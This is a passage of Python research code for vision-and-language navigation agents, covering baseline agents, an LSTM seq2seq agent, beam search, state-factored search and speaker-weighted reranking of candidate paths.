return globals()[name+"Agent"]
def test(self, beam_size=1, successors=1, speaker=(None,None,None,None)):
self.env.reset_epoch()
self.losses = []
self.results = {}
# We rely on env showing the entire batch before repeating anything
#print 'Testing %s' % self.__class__.__name__
speaker, speaker_weights, speaker_merge, evaluator = speaker
looped = False
batch_i, index_count = 0, [Counter() for _ in range(len(speaker_weights))] if speaker else []# for beam search
while True:
trajs = self.rollout(beam_size, successors)
if beam_size > 1 or debug_beam:
trajs, completed, traversed_list = trajs
for ti, traj in enumerate(trajs):
if (beam_size == 1 and debug_beam) or (beam_size>1 and speaker is None):
traj = traj[0]
elif beam_size>1 and (speaker is not None):#use speaker
traj = speaker_rank(speaker, speaker_weights, speaker_merge, traj, completed[ti], traversed_list[ti] if traversed_list else None, index_count)
else:
assert (beam_size == 1 and not debug_beam)
if traj['instr_id'] in self.results:
looped = True
else:
#if testing_settingA:
if self.testing_settingA:
self.results[traj['instr_id']] = (traj['path'], traj['prob']) # choose one from three according to prob
else:
self.results[traj['instr_id']] = traj['path']
if looped:
break
if beam_size>1: print('batch',batch_i)
batch_i+=1
# if use speaker, find best weight
if beam_size>1 and (speaker is not None): # speaker's multiple choices
best_sr, best_speaker_weight_i = -1, -1
for spi, speaker_weight in enumerate(speaker_weights):
if '_' in list(self.results.keys())[0]:
output = [{'instr_id': k, 'trajectory': v[spi]} for k, v in self.results.items()]
else:
output = [{'instr_id': '%s_%d' % (k, i), 'trajectory': v[spi]} for k, v in self.results.items() for i in
range(self.env.traj_n_sents[k])]
score_summary, _ = evaluator.score_output(output)
data_log = defaultdict(list)
for metric, val in score_summary.items():
data_log['%s %s' % (''.join(evaluator.splits), metric)].append(val)
print(index_count[spi])
print(speaker_weights[spi], '\n'.join([str((k, round(v[0], 4))) for k, v in sorted(data_log.items())]))
sr = score_summary['success_rate']
if sr>best_sr:
best_sr, best_speaker_weight_i = sr, spi
print('best sr:',best_sr,' speaker weight:',speaker_weights[best_speaker_weight_i])
print('best sr counter', index_count[best_speaker_weight_i])
self.results = {k: v[best_speaker_weight_i] for k, v in self.results.items()}
def speaker_rank(speaker, speaker_weights, speaker_merge, beam_candidates, this_completed, traversed_lists, index_count):  # TODO: this_completed is not sorted, so it does not correspond to beam_candidates
cand_obs, cand_actions, multi = [], [], isinstance(beam_candidates[0]['instr_encoding'], list)
cand_instr = [[] for _ in beam_candidates[0]['instr_encoding']] if multi else [] # else should be np.narray
for candidate in beam_candidates:
cand_obs.append(candidate['observations'])
cand_actions.append(candidate['actions'])
if multi:
for si, encoding in enumerate(candidate['instr_encoding']):
cand_instr[si].append(np.trim_zeros(encoding)[:-1])
else:
cand_instr.append(np.trim_zeros(candidate['instr_encoding'])[:-1])
if multi:
speaker_scored_candidates = [[] for _ in (beam_candidates)]
for si, sub_cand_instr in enumerate(cand_instr):
speaker_scored_candidates_si, _ = \
speaker._score_obs_actions_and_instructions(
cand_obs, cand_actions, sub_cand_instr, feedback='teacher')
for sc_i, sc in enumerate(speaker_scored_candidates_si):
speaker_scored_candidates[sc_i].append(sc)
else:
speaker_scored_candidates, _ = \
speaker._score_obs_actions_and_instructions(
cand_obs, cand_actions, cand_instr, feedback='teacher')
assert len(speaker_scored_candidates) == len(beam_candidates)
follower_scores = []
speaker_scores = []
score_merge = {'mean':np.mean,'max':np.max,'min':np.min}[speaker_merge]
    for i, candidate in enumerate(beam_candidates):  # unlike speaker-follower, our beam_candidates is not nested; we already received a subset outside this function, so we do not need to flatten it before enumerating
speaker_scored_candidate = speaker_scored_candidates[i]
if multi:
assert candidate['instr_id'] == speaker_scored_candidate[0]['instr_id']
candidate['speaker_score'] = score_merge([s['score'] for s in speaker_scored_candidate])
else:
assert candidate['instr_id'] == speaker_scored_candidate['instr_id']
candidate['speaker_score'] = speaker_scored_candidate['score']
candidate['follower_score'] = candidate['score']
del candidate['observations']
if traversed_lists:# physical_traversal:
last_traversed = traversed_lists[-1]
candidate_inf_state = \
this_completed[i]
path_from_last_to_next = least_common_viewpoint_path(
last_traversed, candidate_inf_state)
assert path_from_last_to_next[0].world_state.viewpointId \
== last_traversed.world_state.viewpointId
assert path_from_last_to_next[-1].world_state.viewpointId \
== candidate_inf_state.world_state.viewpointId
inf_traj = (traversed_lists +
path_from_last_to_next[1:])
physical_trajectory = [
path_element_from_observation(inf_state.observation)
for inf_state in inf_traj]
# make sure the viewpointIds match
assert (physical_trajectory[-1][0] ==
candidate['path'][-1][0])
candidate['path'] = physical_trajectory
follower_scores.append(candidate['follower_score'])
speaker_scores.append(candidate['speaker_score'])
speaker_std = np.std(speaker_scores)
follower_std = np.std(follower_scores)
instr_id = beam_candidates[0]['instr_id']
result_path = []
for spi, speaker_weight in enumerate(speaker_weights):
speaker_scaled_weight = float(speaker_weight) / speaker_std
follower_scaled_weight = (1 - float(speaker_weight)) / follower_std
best_ix, best_cand = max(
enumerate(beam_candidates),
key=lambda tp: (
tp[1]['speaker_score'] * speaker_scaled_weight +
tp[1]['follower_score'] * follower_scaled_weight))
result_path.append(best_cand['path'])
index_count[spi][best_ix] += 1
return {'instr_id': instr_id, 'path': result_path}
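# --- Illustrative aside (not part of the original agent code) ---------------------------
# speaker_rank() above combines the two scores for each candidate as
#     speaker_score * w / std(speaker_scores) + follower_score * (1 - w) / std(follower_scores)
# and keeps the argmax for every speaker weight w. A tiny sketch of that arithmetic with
# made-up values (this helper is illustrative only and never called; np is imported at the
# top of this file):
def _speaker_weight_combination_demo(w=0.5):
    speaker = np.array([-2.0, -1.5, -3.0])    # hypothetical speaker log-probs per candidate
    follower = np.array([-0.4, -0.9, -0.2])   # hypothetical follower log-probs per candidate
    combined = speaker * (w / speaker.std()) + follower * ((1 - w) / follower.std())
    return int(combined.argmax())             # index of the best-ranked candidate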
class StopAgent(BaseAgent):
''' An agent that doesn't move! '''
def rollout(self, beam_size=1):
world_states = self.env.reset()
obs = np.array(self.env._get_obs(world_states))
traj = [{
'instr_id': ob['instr_id'],
'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]
} for ob in obs]
return traj
class RandomAgent(BaseAgent):
''' An agent that picks a random direction then tries to go straight for
five viewpoint steps and then stops. '''
def __init__(self, env, results_path):
super(RandomAgent, self).__init__(env, results_path)
random.seed(1)
def rollout(self, beam_size=1):
world_states = self.env.reset()
obs = self.env._get_obs(world_states)
traj = [{
'instr_id': ob['instr_id'],
'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]
} for ob in obs]
self.steps = random.sample(list(range(-11,1)), len(obs))
ended = [False] * len(obs)
for t in range(30):
actions = []
for i,ob in enumerate(obs):
if self.steps[i] >= 5:
actions.append((0, 0, 0)) # do nothing, i.e. end
ended[i] = True
elif self.steps[i] < 0:
actions.append((0, 1, 0)) # turn right (direction choosing)
self.steps[i] += 1
elif len(ob['navigableLocations']) > 1:
actions.append((1, 0, 0)) # go forward
self.steps[i] += 1
else:
actions.append((0, 1, 0)) # turn right until we can go forward
obs = self.env._get_obs(self.env.step(actions))
for i,ob in enumerate(obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
return traj
class ShortestAgent(BaseAgent):
''' An agent that always takes the shortest path to goal. '''
def rollout(self, beam_size=1):
world_states = self.env.reset()
obs = np.array(self.env._get_obs(world_states))
traj = [{
'instr_id': ob['instr_id'],
'path': [(ob['viewpoint'], ob['heading'], ob['elevation'])]
} for ob in obs]
ended = np.array([False] * len(obs))
while True:
actions = [ob['teacher'] for ob in obs]
obs = self.env._get_obs(self.env.step(actions))
for i,a in enumerate(actions):
if a == (0, 0, 0):
ended[i] = True
for i,ob in enumerate(obs):
if not ended[i]:
traj[i]['path'].append((ob['viewpoint'], ob['heading'], ob['elevation']))
if ended.all():
break
return traj
class ShortestCollectAgent(BaseAgent):
''' An agent that always takes the shortest path to goal. '''
def __init__(self, env, results_path, max_episode_len, name=""):
super(ShortestCollectAgent, self).__init__(env, results_path)
self.episode_len = max_episode_len
self.name = name
def collect(self):
idx = 0
total_traj = len(self.env.data)
data = list()
while len(data) < total_traj:
traj = self.rollout()
data.extend(traj)
print("you collected %d shortest paths" % (len(data)))
file_name = "/shortest_{}.json".format(self.name)
with open(self.results_path + file_name, 'w+') as f:
json.dump(data, f)
def rollout(self, beam_size=1):
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
traj = [{
'instr_id': ob['instr_id'],
'path': [(ob['scan'], ob['viewpoint'], ob['viewIndex'],ob['heading'], ob['elevation'])],
'teacher_actions':[],
'teacher_action_emd':[],
'instr_encoding':ob['instr_encoding'].tolist()
} for ob in obs]
ended = np.array([False] * len(obs))
#while True:
for t in range(self.episode_len):
actions = [ob['teacher'] for ob in obs]
for i,a in enumerate(actions):
if not ended[i]:
traj[i]['teacher_actions'].append(a)
if a == 0:
traj[i]['teacher_action_emd'].append((-1,90,90))
else:
traj[i]['teacher_action_emd'].append((obs[i]['adj_loc_list'][a]['absViewIndex'], obs[i]['adj_loc_list'][a]['rel_heading'],obs[i]['adj_loc_list'][a]['rel_elevation']))
obs = self.env._get_obs(self.env.step(actions, obs))
for i,a in enumerate(actions):
if a == (0, 0, 0) or a == 0:
ended[i] = True
for i,ob in enumerate(obs):
if not ended[i]:
traj[i]['path'].append((ob['scan'], ob['viewpoint'], ob['viewIndex'],ob['heading'], ob['elevation']))
if ended.all():
break
return traj
# endregion
class Seq2SeqAgent(BaseAgent):
''' An agent based on an LSTM seq2seq model with attention. '''
model_actions, env_actions = basic_actions()
feedback_options = ['teacher', 'argmax', 'sample']
def __init__(self, env, results_path, encoder, decoder, seed, aux_ratio, decoder_init,
params=None, monotonic=False, episode_len=20, state_factored=False, accu_n_iters = 0): # , subgoal
super(Seq2SeqAgent, self).__init__(env, results_path, seed=seed)
self.encoder, self.decoder = encoder, decoder # encoder2 is only for self_critic
self.encoder2, self.decoder2 = None, None
self.monotonic = monotonic
if self.monotonic:
self.copy_seq2seq()
self.episode_len = episode_len
self.losses = []
self.losses_ctrl_f = [] # For learning auxiliary tasks
self.aux_ratio = aux_ratio
self.decoder_init = decoder_init
self.clip_gradient = params['clip_gradient']
self.clip_gradient_norm = params['clip_gradient_norm']
self.reward_func = params['reward_func']
self.schedule_ratio = params['schedule_ratio']
self.temp_alpha = params['temp_alpha']
self.testing_settingA = params['test_A']
if self.decoder.action_space == 6:
self.ignore_index = self.model_actions.index('<ignore>')
else:
self.ignore_index = -1
self.criterion = nn.CrossEntropyLoss(ignore_index=self.ignore_index)
if self.decoder.ctrl_feature:
assert self.decoder.action_space == -1 # currently only implement this
self.criterion_ctrl_f = nn.MSELoss() # todo: MSE or ?
self.state_factored = state_factored
self.accu_n_iters = accu_n_iters
@staticmethod
def n_inputs():
return len(Seq2SeqAgent.model_actions)
@staticmethod
def n_outputs():
return len(Seq2SeqAgent.model_actions)-2 # Model doesn't output start or ignore
def _sort_batch(self, obs):
sorted_tensor, mask, seq_lengths, perm_idx = sort_batch(obs)
if isinstance(sorted_tensor, list):
sorted_tensors, masks, seqs_lengths = [], [], []
for i in range(len(sorted_tensor)):
sorted_tensors.append(Variable(sorted_tensor[i], requires_grad=False).long().to(device))
masks.append(mask[i].byte().to(device))
seqs_lengths.append(seq_lengths[i])
return sorted_tensors, masks, seqs_lengths, perm_idx
return Variable(sorted_tensor, requires_grad=False).long().to(device), \
mask.byte().to(device), \
list(seq_lengths), list(perm_idx)
def _feature_variable(self, obs):
''' Extract precomputed features into variable. '''
#feature_size = obs[0]['feature'].shape[0]
#features = np.empty((len(obs),feature_size), dtype=np.float32)
if isinstance(obs[0]['feature'],tuple): # todo?
features_pano = np.repeat(np.expand_dims(np.zeros_like(obs[0]['feature'][0], dtype=np.float32), 0), len(obs), axis=0) # jolin
features = np.repeat(np.expand_dims(np.zeros_like(obs[0]['feature'][1], dtype=np.float32), 0), len(obs), axis=0) # jolin
for i,ob in enumerate(obs):
features_pano[i] = ob['feature'][0]
features[i] = ob['feature'][1]
return (Variable(torch.from_numpy(features_pano), requires_grad=False).to(device),
Variable(torch.from_numpy(features), requires_grad=False).to(device))
else:
features = np.repeat(np.expand_dims(np.zeros_like(obs[0]['feature'], dtype=np.float32),0),len(obs),axis=0) # jolin
for i,ob in enumerate(obs):
features[i] = ob['feature']
return Variable(torch.from_numpy(features), requires_grad=False).to(device)
def get_next(self, feedback, target, logit):
if feedback == 'teacher':
a_t = target # teacher forcing
elif feedback == 'argmax':
_, a_t = logit.max(1) # student forcing - argmax
a_t = a_t.detach()
elif feedback == 'sample':
probs = F.softmax(logit, dim=1)
m = D.Categorical(probs)
a_t = m.sample() # sampling an action from model
else:
sys.exit('Invalid feedback option')
return a_t
def _action_variable(self, obs):
# get the maximum number of actions of all sample in this batch
max_num_a = -1
for i, ob in enumerate(obs):
max_num_a = max(max_num_a, len(ob['adj_loc_list']))
is_valid = np.zeros((len(obs), max_num_a), np.float32)
action_embedding_dim = obs[0]['action_embedding'].shape[-1]
action_embeddings = np.zeros((len(obs), max_num_a, action_embedding_dim), dtype=np.float32)
for i, ob in enumerate(obs):
adj_loc_list = ob['adj_loc_list']
num_a = len(adj_loc_list)
is_valid[i, 0:num_a] = 1.
action_embeddings[i, :num_a, :] = ob['action_embedding'] #bug: todo
#for n_a, adj_dict in enumerate(adj_loc_list):
# action_embeddings[i, :num_a, :] = ob['action_embedding']
return (Variable(torch.from_numpy(action_embeddings), requires_grad=False).to(device),
Variable(torch.from_numpy(is_valid), requires_grad=False).to(device),
is_valid)
def _teacher_action_variable(self, obs):
# get the maximum number of actions of all sample in this batch
action_embedding_dim = obs[0]['action_embedding'].shape[-1]
action_embeddings = np.zeros((len(obs), action_embedding_dim), dtype=np.float32)
for i, ob in enumerate(obs):
adj_loc_list = ob['adj_loc_list']
action_embeddings[i, :] = ob['action_embedding'][ob['teacher']] #bug: todo
#for n_a, adj_dict in enumerate(adj_loc_list):
# action_embeddings[i, :num_a, :] = ob['action_embedding']
return Variable(torch.from_numpy(action_embeddings), requires_grad=False).to(device)
def _teacher_action(self, obs, ended):
a = teacher_action(self.model_actions, self.decoder.action_space, obs, ended, self.ignore_index)
return Variable(a, requires_grad=False).to(device)
def _teacher_feature(self, obs, ended):#, max_num_a):
''' Extract teacher look ahead auxiliary features into variable. '''
# todo: 6 action space
ctrl_features_dim = -1
for i, ob in enumerate(obs): # todo: whether include <stop> ?
# max_num_a = max(max_num_a, len(ob['ctrl_features']))
if ctrl_features_dim<0 and len(ob['ctrl_features']):
ctrl_features_dim = ob['ctrl_features'].shape[-1] #[0].shape[-1]
break
#is_valid no need to create. already created
ctrl_features_tensor = np.zeros((len(obs), ctrl_features_dim), dtype=np.float32)
for i, ob in enumerate(obs):
if not ended[i]:
ctrl_features_tensor[i, :] = ob['ctrl_features']
return Variable(torch.from_numpy(ctrl_features_tensor), requires_grad=False).to(device)
def rollout(self, beam_size=1, successors=1):
if beam_size ==1 and not debug_beam:
if self.encoder.__class__.__name__ in ['BertImgEncoder','MultiVilBertEncoder','BertAddEncoder','MultiVilAddEncoder','MultiAddLoadEncoder', 'HugAddEncoder','MultiHugAddEncoder']:
return self.bert_rollout_with_loss()
elif self.encoder.__class__.__name__ in ['BertLangEncoder']:
return self.langbert_rollout_with_loss()
else:
return self.rollout_with_loss()
# beam
with torch.no_grad():
if self.state_factored:
beams = self.state_factored_search(beam_size, successors, first_n_ws_key=4)
else:
beams = self.beam_search(beam_size)
return beams
def state_factored_search(self, completion_size, successor_size, first_n_ws_key=4):
assert self.decoder.panoramic
world_states = self.env.reset(sort=True)
initial_obs = (self.env._get_obs(world_states))
batch_size = len(world_states)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch([o for ob in initial_obs for o in ob])
world_states = [[world_state for f, world_state in states] for states in world_states]
ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
completed = []
completed_holding = []
for _ in range(batch_size):
completed.append({})
completed_holding.append({})
state_cache = [
{ws[0][0:first_n_ws_key]: (InferenceState(prev_inference_state=None,
world_state=ws[0],
observation=o[0],
flat_index=None,
last_action=-1,
last_action_embedding=self.decoder.u_begin,
action_count=0,
score=0.0, h_t=h_t[i], c_t=c_t[i], last_alpha=None), True)}
for i, (ws, o) in enumerate(zip(world_states, initial_obs))
]
beams = [[inf_state for world_state, (inf_state, expanded) in sorted(instance_cache.items())]
for instance_cache in state_cache] # sorting is a noop here since each instance_cache should only contain one
last_expanded_list = []
traversed_lists = []
for beam in beams:
assert len(beam)==1
first_state = beam[0]
last_expanded_list.append(first_state)
traversed_lists.append([first_state])
def update_traversed_lists(new_visited_inf_states):
assert len(new_visited_inf_states) == len(last_expanded_list)
assert len(new_visited_inf_states) == len(traversed_lists)
for instance_index, instance_states in enumerate(new_visited_inf_states):
last_expanded = last_expanded_list[instance_index]
# todo: if this passes, shouldn't need traversed_lists
assert last_expanded.world_state.viewpointId == traversed_lists[instance_index][-1].world_state.viewpointId
for inf_state in instance_states:
path_from_last_to_next = least_common_viewpoint_path(last_expanded, inf_state)
# path_from_last should include last_expanded's world state as the first element, so check and drop that
assert path_from_last_to_next[0].world_state.viewpointId == last_expanded.world_state.viewpointId
assert path_from_last_to_next[-1].world_state.viewpointId == inf_state.world_state.viewpointId
traversed_lists[instance_index].extend(path_from_last_to_next[1:])
last_expanded = inf_state
last_expanded_list[instance_index] = last_expanded
# Do a sequence rollout and calculate the loss
while any(len(comp) < completion_size for comp in completed):
beam_indices = []
u_t_list = []
h_t_list = []
c_t_list = []
flat_obs = []
for beam_index, beam in enumerate(beams):
for inf_state in beam:
beam_indices.append(beam_index)
u_t_list.append(inf_state.last_action_embedding)
h_t_list.append(inf_state.h_t.unsqueeze(0))
c_t_list.append(inf_state.c_t.unsqueeze(0))
flat_obs.append(inf_state.observation)
u_t_prev = torch.stack(u_t_list, dim=0)
assert len(u_t_prev.shape) == 2
# Image features from obs
# if self.decoder.panoramic:
f_t_all, f_t = self._feature_variable(flat_obs)
# Action feature from obs
# if self.decoder.action_space == 6:
# u_t_features, is_valid = np.zeros((batch_size, 1)), None
# else:
u_t_features, is_valid, is_valid_numpy = self._action_variable(flat_obs)
h_t = torch.cat(h_t_list, dim=0)
c_t = torch.cat(c_t_list, dim=0)
h_t, c_t, alpha, logit, pred_f = self.decoder(None, u_t_prev, u_t_features, f_t,
f_t_all, h_t, c_t, [ctx_si[beam_indices] for ctx_si in ctx] if isinstance(ctx, list) else ctx[beam_indices],
[seq_mask_si[beam_indices] for seq_mask_si in seq_mask] if isinstance(ctx, list) else seq_mask[beam_indices])
# Mask outputs of invalid actions
logit[is_valid == 0] = -float('inf')
# # Mask outputs where agent can't move forward
# no_forward_mask = [len(ob['navigableLocations']) <= 1 for ob in flat_obs]
masked_logit = logit
log_probs = F.log_softmax(logit, dim=1).data
# force ending if we've reached the max time steps
# if t == self.episode_len - 1:
# action_scores = log_probs[:,self.end_index].unsqueeze(-1)
# action_indices = torch.from_numpy(np.full((log_probs.size()[0], 1), self.end_index))
# else:
#_, action_indices = masked_logit.data.topk(min(successor_size, logit.size()[1]), dim=1)
_, action_indices = masked_logit.data.topk(logit.size()[1], dim=1) # todo: fix this
action_scores = log_probs.gather(1, action_indices)
assert action_scores.size() == action_indices.size()
start_index = 0
assert len(beams) == len(world_states)
all_successors = []
for beam_index, (beam, beam_world_states) in enumerate(zip(beams, world_states)):
successors = []
end_index = start_index + len(beam)
assert len(beam_world_states) == len(beam)
if beam:
for inf_index, (inf_state, world_state, action_score_row) in \
enumerate(zip(beam, beam_world_states, log_probs[start_index:end_index])):
flat_index = start_index + inf_index
for action_index, action_score in enumerate(action_score_row):
if is_valid_numpy[flat_index, action_index] == 0:
continue
successors.append(
InferenceState(prev_inference_state=inf_state, world_state=world_state,
observation=flat_obs[flat_index],
flat_index=None,
last_action=action_index,
last_action_embedding=u_t_features[flat_index, action_index].detach(),
action_count=inf_state.action_count + 1,
score=float(inf_state.score + action_score),
h_t=h_t[flat_index], c_t=c_t[flat_index],
last_alpha=[alpha_si[flat_index].data for alpha_si in alpha] if isinstance(alpha, list) else alpha[flat_index].data)
)
start_index = end_index
successors = sorted(successors, key=lambda t: t.score, reverse=True)
all_successors.append(successors)
successor_world_states = [
[inf_state.world_state for inf_state in successors]
for successors in all_successors
]
successor_env_actions = [
[inf_state.last_action for inf_state in successors]
for successors in all_successors
]
successor_last_obs = [
[inf_state.observation for inf_state in successors]
for successors in all_successors
]
successor_world_states = self.env.step(successor_env_actions, successor_last_obs, successor_world_states)
successor_world_states = [[world_state for f, world_state in states] for states in successor_world_states]
acc = []
for ttt in zip(all_successors, successor_world_states):
mapped = [inf._replace(world_state=ws) for inf, ws in zip(*ttt)]
acc.append(mapped)
all_successors = acc
assert len(all_successors) == len(state_cache)
new_beams = []
for beam_index, (successors, instance_cache) in enumerate(zip(all_successors, state_cache)):
# early stop if we've already built a sizable completion list
instance_completed = completed[beam_index]
instance_completed_holding = completed_holding[beam_index]
if len(instance_completed) >= completion_size:
new_beams.append([])
continue
for successor in successors:
ws_keys = successor.world_state[0:first_n_ws_key]
if successor.last_action == 0 or successor.action_count == self.episode_len:
if ws_keys not in instance_completed_holding or instance_completed_holding[ws_keys][
0].score < successor.score:
instance_completed_holding[ws_keys] = (successor, False)
else:
if ws_keys not in instance_cache or instance_cache[ws_keys][0].score < successor.score:
instance_cache[ws_keys] = (successor, False)
# third value: did this come from completed_holding?
uncompleted_to_consider = ((ws_keys, inf_state, False) for (ws_keys, (inf_state, expanded)) in
instance_cache.items() if not expanded)
completed_to_consider = ((ws_keys, inf_state, True) for (ws_keys, (inf_state, expanded)) in
instance_completed_holding.items() if not expanded)
import itertools
import heapq
to_consider = itertools.chain(uncompleted_to_consider, completed_to_consider)
ws_keys_and_inf_states = heapq.nlargest(successor_size, to_consider, key=lambda pair: pair[1].score)
new_beam = []
for ws_keys, inf_state, is_completed in ws_keys_and_inf_states:
if is_completed:
assert instance_completed_holding[ws_keys] == (inf_state, False)
instance_completed_holding[ws_keys] = (inf_state, True)
if ws_keys not in instance_completed or instance_completed[ws_keys].score < inf_state.score:
instance_completed[ws_keys] = inf_state
else:
instance_cache[ws_keys] = (inf_state, True)
new_beam.append(inf_state)
if len(instance_completed) >= completion_size:
new_beams.append([])
else:
new_beams.append(new_beam)
beams = new_beams
# Early exit if all ended
if not any(beam for beam in beams):
break
world_states = [
[inf_state.world_state for inf_state in beam]
for beam in beams
]
successor_obs = np.array(self.env._get_obs(self.env.world_states2feature_states(world_states)))
acc = []
for tttt in zip(beams, successor_obs):
mapped = [inf._replace(observation=o) for inf, o in zip(*tttt)]
acc.append(mapped)
beams = acc
update_traversed_lists(beams)
completed_list = []
for this_completed in completed:
completed_list.append(sorted(this_completed.values(), key=lambda t: t.score, reverse=True)[:completion_size])
completed_ws = [
[inf_state.world_state for inf_state in comp_l]
for comp_l in completed_list
]
completed_obs = np.array(self.env._get_obs(self.env.world_states2feature_states(completed_ws)))
accu = []
for ttttt in zip(completed_list, completed_obs):
mapped = [inf._replace(observation=o) for inf, o in zip(*ttttt)]
accu.append(mapped)
completed_list = accu
update_traversed_lists(completed_list)
trajs = []
for this_completed in completed_list:
assert this_completed
this_trajs = []
for inf_state in this_completed:
path_states, path_observations, path_actions, path_scores, path_attentions = backchain_inference_states(inf_state)
# this will have messed-up headings for (at least some) starting locations because of
# discretization, so read from the observations instead
## path = [(obs.viewpointId, state.heading, state.elevation)
## for state in path_states]
trajectory = [path_element_from_observation(ob) for ob in path_observations]
this_trajs.append({
'instr_id': path_observations[0]['instr_id'],
'instr_encoding': path_observations[0]['instr_encoding'],
'path': trajectory,
'observations': path_observations,
'actions': path_actions,
'score': inf_state.score,
'scores': path_scores,
'attentions': path_attentions
})
trajs.append(this_trajs)
return trajs, completed_list, traversed_lists
def beam_search(self, beam_size):
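# Standard per-instruction beam search: keep at most beam_size partial trajectories ranked by
# cumulative log-probability, move trajectories that emit STOP (action 0) or reach episode_len
# into `completed`, and finally return the best beam_size completed trajectories per instruction.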
assert self.decoder.panoramic
# assert self.env.beam_size >= beam_size
world_states = self.env.reset(True) # [(feature, state)]
obs = np.array(self.env._get_obs(world_states))
batch_size = len(world_states)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch([o for ob in obs for o in ob])
world_states = [[world_state for f, world_state in states] for states in world_states]
ctx, h_t, c_t, seq_mask = self.encoder(seq, seq_mask, seq_lengths)
if not self.decoder_init:
h_t, c_t = torch.zeros_like(h_t), torch.zeros_like(c_t)
completed = []
for _ in range(batch_size):
completed.append([])
beams = [[InferenceState(prev_inference_state=None,
world_state=ws[0],
observation=o[0],
flat_index=i,
last_action=-1,
last_action_embedding=self.decoder.u_begin,
action_count=0,
score=0.0,
h_t=None, c_t=None,
last_alpha=None)]
for i, (ws, o) in enumerate(zip(world_states, obs))]
#
# batch_size x beam_size
for t in range(self.episode_len):
flat_indices = []
beam_indices = []
u_t_list = []
for beam_index, beam in enumerate(beams):
for inf_state in beam:
beam_indices.append(beam_index)
flat_indices.append(inf_state.flat_index)
u_t_list.append(inf_state.last_action_embedding)
u_t_prev = torch.stack(u_t_list, dim=0)
flat_obs = [ob for obs_beam in obs for ob in obs_beam]
# Image features from obs
# if self.decoder.panoramic:
f_t_all, f_t = self._feature_variable(flat_obs)
# Action feature from obs
# if self.decoder.action_space == 6:
# u_t_features, is_valid = np.zeros((batch_size, 1)), None
# else:
u_t_features, is_valid, is_valid_numpy = self._action_variable(flat_obs)
h_t, c_t, alpha, logit, pred_f = self.decoder(None, u_t_prev, u_t_features,
f_t, f_t_all, h_t[flat_indices], c_t[flat_indices],
[ctx_si[beam_indices] for ctx_si in ctx] if isinstance(ctx, list) else ctx[beam_indices],
[seq_mask_si[beam_indices] for seq_mask_si in seq_mask] if isinstance(ctx, list) else seq_mask[beam_indices])
# Mask logits of invalid actions
logit[is_valid == 0] = -float('inf')
masked_logit = logit # alias kept for readability; logits are already masked in place
log_probs = F.log_softmax(logit, dim=1).data
_, action_indices = masked_logit.data.topk(min(beam_size, logit.size()[1]), dim=1)
action_scores = log_probs.gather(1, action_indices)
assert action_scores.size() == action_indices.size()
start_index = 0
new_beams = []
assert len(beams) == len(world_states)
all_successors = []
for beam_index, (beam, beam_world_states, beam_obs) in enumerate(zip(beams, world_states, obs)):
successors = []
end_index = start_index + len(beam)
assert len(beam_obs) == len(beam) and len(beam_world_states) == len(beam)
if beam:
for inf_index, (inf_state, world_state, ob, action_score_row, action_index_row) in \
enumerate(zip(beam, beam_world_states, beam_obs, action_scores[start_index:end_index],
action_indices[start_index:end_index])):
flat_index = start_index + inf_index
for action_score, action_index in zip(action_score_row, action_index_row):
if is_valid_numpy[flat_index, action_index] == 0:
continue
successors.append(
InferenceState(prev_inference_state=inf_state,
world_state=world_state,
# will be updated later after successors are pruned
observation=ob, # will be updated later after successors are pruned
flat_index=flat_index,
last_action=action_index,
last_action_embedding=u_t_features[flat_index, action_index].detach(),
action_count=inf_state.action_count + 1,
score=float(inf_state.score + action_score), h_t=None, c_t=None,
last_alpha=[alpha_si[flat_index].data for alpha_si in alpha] if isinstance(alpha, list) else alpha[flat_index].data)
)
start_index = end_index
successors = sorted(successors, key=lambda t: t.score, reverse=True)[:beam_size]
all_successors.append(successors)
successor_world_states = [
[inf_state.world_state for inf_state in successors]
for successors in all_successors
]
successor_env_actions = [
[inf_state.last_action for inf_state in successors]
for successors in all_successors
]
successor_last_obs = [
[inf_state.observation for inf_state in successors]
for successors in all_successors
]
successor_world_states = self.env.step(successor_env_actions, successor_last_obs, successor_world_states)
successor_obs = np.array(self.env._get_obs(successor_world_states))
successor_world_states = [[world_state for f, world_state in states] for states in successor_world_states]
updated_successors = []
for succs, succ_ws, succ_obs in zip(all_successors, successor_world_states, successor_obs):
mapped = [inf._replace(world_state=ws, observation=o) for inf, ws, o in zip(succs, succ_ws, succ_obs)]
updated_successors.append(mapped)
all_successors = updated_successors
for beam_index, successors in enumerate(all_successors):
new_beam = []
for successor in successors:
if successor.last_action == 0 or t == self.episode_len - 1:
completed[beam_index].append(successor)
else:
new_beam.append(successor)
if len(completed[beam_index]) >= beam_size:
new_beam = []
new_beams.append(new_beam)
beams = new_beams
world_states = [
[inf_state.world_state for inf_state in beam]
for beam in beams
]
obs = [
[inf_state.observation for inf_state in beam]
for beam in beams
]
# Early exit if all ended
if not any(beam for beam in beams):
break
trajs = []
for this_completed in completed:
assert this_completed
this_trajs = []
for inf_state in sorted(this_completed, key=lambda t: t.score, reverse=True)[:beam_size]:
path_states, path_observations, path_actions, path_scores, path_attentions = backchain_inference_states(inf_state)
# this will have messed-up headings for (at least some) starting locations because of
# discretization, so read from the observations instead
## path = [(obs.viewpointId, state.heading, state.elevation)
## for state in path_states]
trajectory = [path_element_from_observation(ob) for ob in path_observations]
this_trajs.append({
'instr_id': path_observations[0]['instr_id'],
'instr_encoding': path_observations[0]['instr_encoding'],
'path': trajectory,
'observations': path_observations,
'actions': path_actions,
'score': inf_state.score,
'scores': path_scores,
'attentions': path_attentions
})
trajs.append(this_trajs)
traversed_lists = None # todo
return trajs, completed, traversed_lists
def rollout_with_loss(self):
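# Teacher-/student-forced rollout that accumulates the cross-entropy loss in self.loss
# (plus the auxiliary feature-prediction loss when decoder.ctrl_feature is set) and
# returns the generated trajectories for the current minibatch.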
world_states = self.env.reset(False)
obs = np.array(self.env._get_obs(world_states))
batch_size = len(obs)
# Reorder the language input for the encoder
seq, seq_mask, seq_lengths, perm_idx = self._sort_batch(obs)
perm_obs = obs[perm_idx]
# When there are multiple sentences, perm_idx is simply range(batch_size);
